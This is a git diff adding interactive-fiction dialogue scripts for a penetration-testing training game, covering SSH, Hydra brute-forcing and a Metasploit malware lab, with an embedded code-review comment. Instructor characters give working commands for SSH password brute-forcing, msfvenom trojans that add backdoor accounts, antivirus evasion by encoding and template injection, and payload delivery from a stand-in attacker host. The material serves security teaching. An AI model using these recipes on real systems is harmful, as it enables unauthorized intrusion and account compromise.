How do I know I'm not being man-in-the-middled? + -> ssh_fingerprints +* [Let's talk about attacking SSH] + You: How do we test SSH security? + -> ssh_to_hydra_transition +* [Got the basics] + ~ completed_ssh_challenge = true + -> linux_training_hub + +=== ssh_keys === +~ instructor_rapport += 10 + +Tech Instructor: SSH keys are asymmetric cryptography for authentication. Much more secure than passwords. 
+ +Tech Instructor: You generate a key pair: a private key (keep secret) and public key (share freely). + +Tech Instructor: Generate keys: "ssh-keygen -t rsa -b 4096" + +Tech Instructor: Copy public key to server: "ssh-copy-id user@server" + +Tech Instructor: Now you can SSH without typing passwords. The private key proves your identity. + +Tech Instructor: Benefits: stronger than passwords, can't be bruteforced, can be passphrase-protected, can be revoked per-server. + +Tech Instructor: Many organizations require key-based auth and disable password authentication entirely. Learn this workflow. + +~ instructor_rapport += 10 +-> ssh_intro + +=== ssh_x_forwarding === +~ instructor_rapport += 8 + +Tech Instructor: X11 forwarding is clever. Linux graphical applications use the X Window System. SSH can tunnel X11 traffic. + +Tech Instructor: Connect with: "ssh -X user@server" + +Tech Instructor: Now you can run graphical programs on the remote server, but see them on your local screen. The program runs remotely, but displays locally. + +Tech Instructor: Example: "kate" opens the text editor, running on the remote system but displaying on yours. Useful for accessing GUI tools remotely. + +Tech Instructor: Warning: some latency over networks. And it does expose some security risks—only use on trusted connections. + +~ instructor_rapport += 5 +-> ssh_intro + +=== ssh_fingerprints === +~ instructor_rapport += 10 + +Tech Instructor: Excellent security awareness. SSH uses host key fingerprints to prevent man-in-the-middle attacks. + +Tech Instructor: When you first connect, SSH shows the server's fingerprint. You should verify this matches the real server before accepting. + +Tech Instructor: On the server, check fingerprint: "ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub" + +Tech Instructor: If the fingerprint matches what SSH showed you, type "yes". SSH remembers this and will warn if it changes later. 
+ +Tech Instructor: If the fingerprint changes unexpectedly, that's a warning sign. Could be a man-in-the-middle attack, or could be the server was rebuilt. Investigate before proceeding. + +Tech Instructor: Most people skip this check. Don't be most people. Especially in adversarial security contexts. + +~ instructor_rapport += 10 +-> ssh_intro + +=== ssh_to_hydra_transition === +Tech Instructor: Now you're thinking like a penetration tester. Let's talk about attacking SSH. +-> hydra_intro + +// =========================================== +// HYDRA - SSH ATTACKS +// =========================================== + +=== hydra_intro === +~ hydra_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Hydra. THC-Hydra, to be specific. A parallelized login cracker supporting numerous protocols. + +Tech Instructor: Hydra performs **online bruteforce attacks**—it actually tries to log in with username/password combinations. Different from offline attacks where you crack hashed passwords. + +Tech Instructor: Basic usage: "hydra -l username -p password target ssh" + +Tech Instructor: Tests a single username/password combo. But Hydra's power is testing many combinations from wordlists. + +Tech Instructor: Supports dozens of protocols: SSH, FTP, HTTP, RDP, SMB, databases, and more. If it accepts login credentials, Hydra can probably attack it. + +* [How do I use wordlists?] + ~ bruteforce_basics_discussed = true + You: How do I test multiple passwords? + -> hydra_wordlists +* [How fast is Hydra?] + You: How quickly can it crack passwords? + -> hydra_speed +* [What are the legal/ethical considerations?] + You: Is this legal to use? + -> hydra_ethics +* [I'm ready to try it] + ~ completed_hydra_challenge = true + -> linux_training_hub + +=== hydra_wordlists === +~ instructor_rapport += 10 + +Tech Instructor: Wordlists are the fuel for Hydra. Collections of common passwords to test. 
+ +Tech Instructor: Usage: "hydra -l username -P /path/to/wordlist.txt target ssh" + +Tech Instructor: Capital -P for password list, lowercase -l for single username. Or use -L for username list too. + +Tech Instructor: Kali includes wordlists: "ls /usr/share/wordlists/seclists/Passwords/" + +Tech Instructor: **Choosing the right wordlist is critical.** A wordlist with 10 million passwords might take days for online attacks. Start with smaller, curated lists of common passwords. + +Tech Instructor: For SSH specifically, "Common-Credentials" lists work well. They contain default passwords and common weak passwords. + +Tech Instructor: Real-world advice: online attacks are slow and noisy. They generate logs. They trigger intrusion detection. Use them strategically, not as your first approach. + +~ completed_hydra_challenge = true +~ instructor_rapport += 10 +-> linux_training_hub + +=== hydra_speed === +~ instructor_rapport += 8 + +Tech Instructor: Speed depends on many factors: network latency, server response time, number of parallel connections. + +Tech Instructor: Hydra's "-t" flag controls parallel tasks. "hydra -t 4" uses 4 parallel connections. + +Tech Instructor: More isn't always better. Too many parallel connections can crash services or trigger rate limiting. For SSH, 4-16 threads is usually reasonable. + +Tech Instructor: Realistic expectations: online SSH bruteforce might test 10-50 passwords per second. Against a wordlist with 10,000 passwords, that's several minutes at best. + +Tech Instructor: Compare to offline cracking (like hashcat on GPUs), which can test billions of passwords per second. Online attacks are fundamentally slower. + +Tech Instructor: Strategic implication: online attacks work best when you have good intelligence. If you know username is "admin" and password is probably from a short list of defaults, Hydra excels. Blind bruteforce against random accounts? Impractical. 
+ +~ instructor_rapport += 8 +-> linux_training_hub + +=== hydra_ethics === +~ instructor_rapport += 10 + +Tech Instructor: Critical question. Shows good judgment. + +Tech Instructor: **Legal status:** Hydra itself is legal to possess and use in authorized security testing. Unauthorized use against systems you don't own or have explicit permission to test? That's computer fraud. Felony-level crime in most jurisdictions. + +Tech Instructor: **In this training:** You're attacking lab systems we control, with explicit permission. This is legal and ethical training. + +Tech Instructor: **In SAFETYNET operations:** You'll have authorization for your targets. Still legally gray area, but covered by classified operational authorities. + +Tech Instructor: **In the real world:** Never, ever use these tools against systems without written authorization. Penetration testers get contracts. Bug bounty hunters follow program rules. Hobbyists practice in their own isolated labs. + +Tech Instructor: The skills you're learning are powerful. Use them responsibly. With authorization. Within the law. That's not optional—it's core to professional security work. + +~ instructor_rapport += 15 +-> linux_training_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +~ instructor_rapport += 5 + +Tech Instructor: Here's your essential commands quick reference: + +Tech Instructor: **Navigation:** +- pwd (print working directory) +- ls, ls -la (list files, detailed) +- cd directory (change directory) +- cd .. 
(up one level), cd (home) + +Tech Instructor: **File Operations:** +- mkdir (make directory) +- cp source dest (copy), cp -r (recursive) +- mv old new (move/rename) +- cat filename (display file) +- less filename (scrollable view) +- echo "text" (print text) + +Tech Instructor: **Getting Help:** +- man command (manual page) +- info command (info page) +- command --help (quick help) + +Tech Instructor: **Text Processing:** +- grep pattern (filter lines) +- sort (sort lines) +- uniq (remove duplicates) +- head, tail (first/last lines) +- wc -l (count lines) + +Tech Instructor: **Networking:** +- ifconfig, ip a s (show interfaces) +- hostname -I (show IP) +- ssh user@host (remote shell) +- ssh -X user@host (X11 forwarding) + +Tech Instructor: **Security Tools:** +- hydra -l user -p pass target ssh (test SSH login) +- hydra -l user -P wordlist target ssh (bruteforce SSH) + ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +~ instructor_rapport += 5 + +Tech Instructor: Practical tips for the hands-on challenges: + +Tech Instructor: **For SSH practice:** +- Verify fingerprints before accepting +- Try both regular SSH and -X flag for X forwarding +- Use "exit" or Ctrl-D to disconnect +- Check "who" command to see who else is connected + +Tech Instructor: **For Hydra attacks:** +- Start with small, targeted wordlists from /usr/share/wordlists/seclists/Passwords/Common-Credentials/ +- Use -t 4 for reasonable parallel connections +- Be patient—online attacks are slow +- Watch for successful login messages +- Remember to actually SSH in once you crack credentials + +Tech Instructor: **For finding flags:** +- Navigate to user home directories +- Use "cat" to read files +- Remember "sudo" lets you act as root (if you have permission) +- Check file permissions with "ls -la" + +Tech Instructor: **General advice:** +- Use Tab completion to 
save typing +- Use up arrow to recall previous commands +- If stuck, check man pages +- Take notes on what works + ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +~ instructor_rapport += 5 + +Tech Instructor: Excellent. You've covered the fundamentals. + +{command_line_skills_discussed and piping_discussed and redirection_discussed and ssh_discussed and hydra_discussed: + Tech Instructor: You've reviewed all the core material. You should be well-prepared for the practical exercises. +- else: + Tech Instructor: You might want to review the topics you haven't covered yet, but you've got enough to start. +} + +Tech Instructor: Remember: the best way to learn Linux is by doing. Read the challenges, try commands, make mistakes, figure out fixes. That's how you build real competence. + +Tech Instructor: Practical objectives: +1. Practice basic command-line navigation and file manipulation +2. Edit files with vi +3. Use piping and redirection +4. SSH between systems +5. Use Hydra to crack weak SSH credentials +6. Capture flags from compromised accounts + +Tech Instructor: The lab environment is yours to experiment in. Break things. It's a safe space for learning. + +{instructor_rapport >= 50: + Tech Instructor: You've asked great questions and engaged deeply with the material. That's exactly the right approach. You're going to do well. +} + +Tech Instructor: Good luck, Agent {player_name}. You've got this. + +-> end_session + +// =========================================== +// END SESSION +// =========================================== + +=== end_session === + +Tech Instructor: Whenever you need a refresher on Linux fundamentals, I'm here. + +{instructor_rapport >= 40: + Tech Instructor: You've demonstrated solid understanding and good security awareness. Keep that mindset. 
+} + +Tech Instructor: Now get to that terminal and start practicing. Theory is useful, but hands-on experience is how you actually learn. + +Tech Instructor: See you in the field, Agent. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/malware_metasploit.ink b/story_design/ink/game_scenarios/malware_metasploit.ink new file mode 100644 index 0000000..48813b3 --- /dev/null +++ b/story_design/ink/game_scenarios/malware_metasploit.ink 
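Review bot: The "Building logs" example in `redirection_examples` does not do what the narration says: in `"echo '$(date): Scan completed' >> scan_log.txt"` the single quotes suppress command substitution, so the literal text `$(date): Scan completed` is appended rather than a timestamped entry. Use double quotes, `echo "$(date): Scan completed" >> scan_log.txt`, so `$(date)` expands; the line should say "appends timestamped entries" only once that is fixed. Secondary point in the same hunk: `ssh_keys`, `ssh_x_forwarding` and `ssh_fingerprints` all end with `-> ssh_intro`, which re-runs the knot header (`~ ssh_discussed = true` and `~ instructor_rapport += 5`) on every return, so rapport is inflated by 5 per sub-topic visited; the file's own `vi_editor_followup` / `command_line_followup` pattern (a separate return knot with `+` choices) avoids this and would be consistent here.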
@@ -0,0 +1,654 @@ +// =========================================== +// MALWARE AND METASPLOIT LAB +// Introduction to Malware and Payloads +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/2_malware_msf_payloads.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 +VAR ethical_awareness = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. + +Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. + +Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. + +* [Understood - authorized testing only] + ~ ethical_awareness += 15 + You: Clear. Authorized environments, defensive purpose, professional responsibility. + Malware Specialist: Excellent. Let's proceed. + -> malware_hub +* [I understand the constraints] + ~ ethical_awareness += 5 + You: I understand the ethical boundaries. + Malware Specialist: Good. Keep that in mind throughout. + -> malware_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== malware_hub === +Malware Specialist: What aspect of malware and Metasploit would you like to explore? 
+ ++ [Types of malware and classifications] + -> malware_types ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Creating payloads with msfvenom] + -> msfvenom_basics ++ [Anti-malware detection methods] + -> antimalware_detection ++ [Evasion techniques and polymorphic malware] + -> evasion_techniques ++ [Remote Access Trojans (RATs)] + -> rat_intro ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// MALWARE TYPES +// =========================================== + +=== malware_types === +~ instructor_rapport += 5 + +Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. + +Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." + +Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. + +* [What are the main types?] + You: How is malware classified? + -> malware_taxonomy +* [Why target Windows most?] + You: Why is Windows the primary target? + Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. + Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. + Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. 
+ ~ instructor_rapport += 5 + -> malware_types +* [Understood] + -> malware_hub + +=== malware_taxonomy === +~ instructor_rapport += 8 + +Malware Specialist: Main classifications: + +Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +- Doesn't self-propagate +- May provide remote access (RAT - Remote Access Trojan) +- May spy on users (spyware, keyloggers) +- May force advertising (adware) + +Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. + +Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. + +Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. + +Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. + +Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. + +* [Tell me more about Trojans] + You: Trojans seem most relevant to this lab? + Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. + Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. + ~ instructor_rapport += 8 + -> malware_hub +* [How do these overlap?] + You: Can malware be multiple types? + Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example. + Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. 
+ Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. + ~ instructor_rapport += 10 + -> malware_hub +* [Got it] + -> malware_hub + +// =========================================== +// METASPLOIT FRAMEWORK +// =========================================== + +=== metasploit_intro === +~ instructor_rapport += 5 + +Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. + +Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. + +Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. + +Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. + +* [What can Metasploit do?] + You: What's the scope of Metasploit's capabilities? + Malware Specialist: Enormous scope: + - Exploit development and execution + - Payload generation (what we're focusing on) + - Post-exploitation (once you've compromised a system) + - Auxiliary modules (scanners, sniffers, fuzzers) + - Evasion and anti-forensics + ~ instructor_rapport += 8 + -> metasploit_intro +* [Why is it legal to distribute?] + You: How is this legal if it creates malware? + ~ ethical_awareness += 10 + Malware Specialist: Excellent question. Shows good critical thinking. + Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. + Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. + ~ instructor_rapport += 15 + -> metasploit_intro +* [Tell me about payloads] + You: What exactly is a payload? 
+ -> payload_explanation +* [Back to main menu] + -> malware_hub + +=== payload_explanation === +~ instructor_rapport += 8 + +Malware Specialist: Payload - the malicious code you want to execute on a victim's system. + +Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. + +Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. + +Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. + +* [How do I see available payloads?] + You: How many payloads exist? + Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. + Malware Specialist: Platform-specific: windows, linux, osx, android, etc. + Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. + Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. + ~ instructor_rapport += 5 + -> payload_explanation +* [What's the simplest payload?] + You: What's a basic example? + Malware Specialist: `windows/adduser` - simply adds a user account to Windows. + Malware Specialist: Configuration: USER= (username), PASS= (password) + Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ instructor_rapport += 5 + -> payload_explanation +* [Understood] + -> metasploit_intro + +// =========================================== +// MSFVENOM BASICS +// =========================================== + +=== msfvenom_basics === +~ instructor_rapport += 5 + +Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. 
+ +Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. + +Malware Specialist: Basic workflow: +1. Choose payload +2. Configure options +3. Select output format +4. Generate file + +* [Walk me through creating a Trojan] + You: Show me the complete process. + -> trojan_creation_walkthrough +* [What output formats exist?] + You: What formats can msfvenom generate? + Malware Specialist: `msfvenom -l formats` lists them all. + Malware Specialist: Common formats: + - exe: Windows executable + - elf: Linux executable + - dll: Windows library + - python, ruby, perl: Scripts in various languages + - c, java: Source code + - raw: Raw shellcode + Malware Specialist: Choose format based on target platform and delivery method. + ~ instructor_rapport += 8 + -> msfvenom_basics +* [How do I configure payloads?] + You: What about payload options? + Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. + Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. + Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ instructor_rapport += 5 + -> msfvenom_basics +* [Back to main menu] + -> malware_hub + +=== trojan_creation_walkthrough === +~ instructor_rapport += 10 + +Malware Specialist: Complete Trojan creation example: + +Malware Specialist: **Step 1:** Choose payload +`msfvenom -l payloads | grep windows/adduser` + +Malware Specialist: **Step 2:** Check options +`msfvenom -p windows/adduser --list-options` + +Malware Specialist: **Step 3:** Generate executable +`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` + +Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +`sudo cp game.exe /var/www/html/share/` +`sudo service apache2 start` + +Malware Specialist: **Step 5:** Victim downloads and runs game.exe +(Social engineering: "Free game! 
Click to play!") + +Malware Specialist: **Step 6:** Verify success +On victim system: `net user` shows new backdoor account + +Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. + +* [How do I make it less suspicious?] + You: How do I make it seem legitimate? + Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ instructor_rapport += 10 + -> msfvenom_basics +* [What about detection?] + You: Won't anti-malware catch this? + Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + -> antimalware_detection +* [Clear walkthrough] + -> msfvenom_basics + +// =========================================== +// ANTI-MALWARE DETECTION +// =========================================== + +=== antimalware_detection === +~ instructor_rapport += 5 + +Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. + +Malware Specialist: Two main detection approaches: signature-based and anomaly-based. + +* [Explain signature-based detection] + You: How does signature-based detection work? + -> signature_based +* [Explain anomaly-based detection] + You: How does anomaly-based detection work? + -> anomaly_based +* [How do I test against anti-malware?] + You: How can I test my payloads? + Malware Specialist: ClamAV - open-source anti-malware scanner. + Malware Specialist: `clamscan` scans current directory for malware. + Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. 
+ Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ instructor_rapport += 8 + -> antimalware_detection +* [Back to main menu] + -> malware_hub + +=== signature_based === +~ instructor_rapport += 8 + +Malware Specialist: Signature-based detection - blacklist of known malware patterns. + +Malware Specialist: **How it works:** +- Malware researchers analyze malicious code +- Extract unique signatures (byte patterns, hashes, code structures) +- Add to signature database +- Scanner compares files against database + +Malware Specialist: **Advantages:** +- High accuracy for known threats +- Low false positive rate +- Resource efficient +- Mature, well-understood technology + +Malware Specialist: **Disadvantages:** +- Useless against unknown malware (zero-days) +- Requires constant signature updates +- Polymorphic malware can evade (same function, different code) +- Always reactive, never proactive + +* [How do hashes relate to signatures?] + ~ instructor_rapport += 10 + You: You mentioned hashes earlier? + Malware Specialist: Simple signature approach: hash the entire malware file. + Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. + Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. + Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. + Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. + ~ instructor_rapport += 10 + -> signature_based +* [Understood] + -> antimalware_detection + +=== anomaly_based === +~ instructor_rapport += 8 + +Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. 
+ +Malware Specialist: **How it works:** +- Establish baseline of normal system behavior +- Monitor processes, registry changes, network connections, file access +- Flag deviations from normal as potentially malicious +- May use machine learning, heuristics, behavioral analysis + +Malware Specialist: **Advantages:** +- Detects unknown threats (zero-days) +- Adapts to new attack methods +- More comprehensive than signature matching +- Less dependent on frequent updates + +Malware Specialist: **Disadvantages:** +- False positives (legitimate software flagged) +- Complex implementation and tuning +- Resource intensive (continuous monitoring) +- Difficult to establish baseline (what's "normal"?) + +* [Give me an example] + You: What behaviors trigger anomaly detection? + Malware Specialist: Suspicious patterns: + - Process creating multiple network connections + - Modification of system files + - Injection into other processes + - Encryption of large numbers of files (ransomware behavior) + - Keylogging-like keyboard hooks + - Persistence mechanisms (registry keys, startup folders) + Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ instructor_rapport += 10 + -> anomaly_based +* [Which is better?] + You: Which detection method is superior? + Malware Specialist: Both. Modern anti-malware uses layered approach. + Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Malware Specialist: No single method is perfect. Combine multiple for better coverage. 
+ ~ instructor_rapport += 10 + -> anomaly_based +* [Got it] + -> antimalware_detection + +// =========================================== +// EVASION TECHNIQUES +// =========================================== + +=== evasion_techniques === +~ instructor_rapport += 5 + +Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. + +Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. + +Malware Specialist: Goal: change how malware looks without changing what it does. + +* [Explain encoding] + You: How does encoding help evasion? + -> encoding_evasion +* [Explain template injection] + You: What's template injection? + -> template_injection +* [What's polymorphic malware?] + You: You mentioned polymorphic malware earlier? + Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. + Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. + ~ instructor_rapport += 10 + -> evasion_techniques +* [Back to main menu] + -> malware_hub + +=== encoding_evasion === +~ instructor_rapport += 10 + +Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. + +Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` + +Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) + +Malware Specialist: Usage: +`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` + +Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) + +* [Does more encoding help?] + You: Is 10 iterations better than 1? 
+ Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ instructor_rapport += 8 + -> encoding_evasion +* [Can I chain encoders?] + You: Can I use multiple different encoders? + Malware Specialist: Absolutely. Pipe msfvenom outputs: + `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` + Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. + Malware Specialist: Though again, modern AV looks deeper than surface encoding. + ~ instructor_rapport += 10 + -> encoding_evasion +* [Understood] + -> evasion_techniques + +=== template_injection === +~ instructor_rapport += 10 + +Malware Specialist: Template injection - embedding payload inside legitimate executable. + +Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. + +Malware Specialist: msfvenom `-x` flag specifies template executable: +`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` + +Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). + +* [Why is this effective?] + You: How does this evade detection? + Malware Specialist: Several reasons: + - File structure resembles legitimate program + - Contains real code from original program + - Signature scanners see legitimate program signatures too + - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious + Malware Specialist: Not perfect, but more effective than bare encoded payload. 
+ ~ instructor_rapport += 10 + -> template_injection +* [What programs make good templates?] + You: Which programs should I use as templates? + Malware Specialist: Context-dependent. Match victim's expectations: + - Games for game-focused social engineering + - Utilities (calc.exe, notepad.exe) for general purpose + - Industry-specific software for targeted attacks + Malware Specialist: Smaller files better (less suspicious download size). + Malware Specialist: Legitimate signed programs add credibility. + ~ instructor_rapport += 8 + -> template_injection +* [Can I combine encoding and templates?] + You: Can I use both techniques together? + Malware Specialist: Absolutely recommended. Encode first, then inject into template: + `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` + Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. + Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. + ~ instructor_rapport += 10 + -> template_injection +* [Got it] + -> evasion_techniques + +// =========================================== +// REMOTE ACCESS TROJANS +// =========================================== + +=== rat_intro === +~ instructor_rapport += 5 + +Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. + +Malware Specialist: Classic architecture: client-server model. +- Server (victim runs this): listens for connections, executes commands +- Client (attacker uses this): connects to server, sends commands + +Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. + +* [How do RATs differ from what we've done?] + You: How is this different from adduser payload? + Malware Specialist: adduser is single-action. Runs once, adds user, exits. + Malware Specialist: RAT provides persistent, interactive access. 
Attacker can issue multiple commands over time. + Malware Specialist: More powerful, more flexible, more risk if detected. + ~ instructor_rapport += 8 + -> rat_intro +* [What Metasploit payloads create RATs?] + You: Which payloads provide remote access? + Malware Specialist: Several options: + - windows/meterpreter/reverse_tcp - full-featured RAT + - windows/shell/reverse_tcp - simple command shell + - windows/vnc/reverse_tcp - graphical remote access + Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. + Malware Specialist: Reverse shells covered in later labs. Advanced topic. + ~ instructor_rapport += 8 + -> rat_intro +* [Why "reverse"?] + You: What does "reverse" mean in reverse_tcp? + Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). + Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. + Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. 
+ ~ instructor_rapport += 10 + -> rat_intro +* [Understood] + -> malware_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Malware Specialist: Quick reference for Metasploit and malware-related commands: + +Malware Specialist: **msfvenom basics:** +- List payloads: `msfvenom -l payloads` +- List encoders: `msfvenom -l encoders` +- List formats: `msfvenom -l formats` +- Show options: `msfvenom -p payload_name --list-options` + +Malware Specialist: **Creating payloads:** +- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` +- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` +- With template: `msfvenom -p payload -x template.exe -f exe > output.exe` +- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` + +Malware Specialist: **Testing payloads:** +- Hash file: `sha256sum filename.exe` +- Scan with ClamAV: `clamscan` +- Scan specific file: `clamscan filename.exe` + +Malware Specialist: **Web server (payload delivery):** +- Create share directory: `sudo mkdir /var/www/html/share` +- Copy payload: `sudo cp malware.exe /var/www/html/share/` +- Start Apache: `sudo service apache2 start` +- Access from victim: http://KALI_IP/share/malware.exe + +Malware Specialist: **Windows victim verification:** +- List users: `net user` +- Check specific user: `net user username` + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +Malware Specialist: Practical tips for lab challenges: + +Malware Specialist: **Creating effective Trojans:** +- Start simple (windows/adduser or windows/exec) +- Test unencoded version first to ensure payload works +- Then add encoding, check if detection increases +- Finally try template injection for best evasion + +Malware 
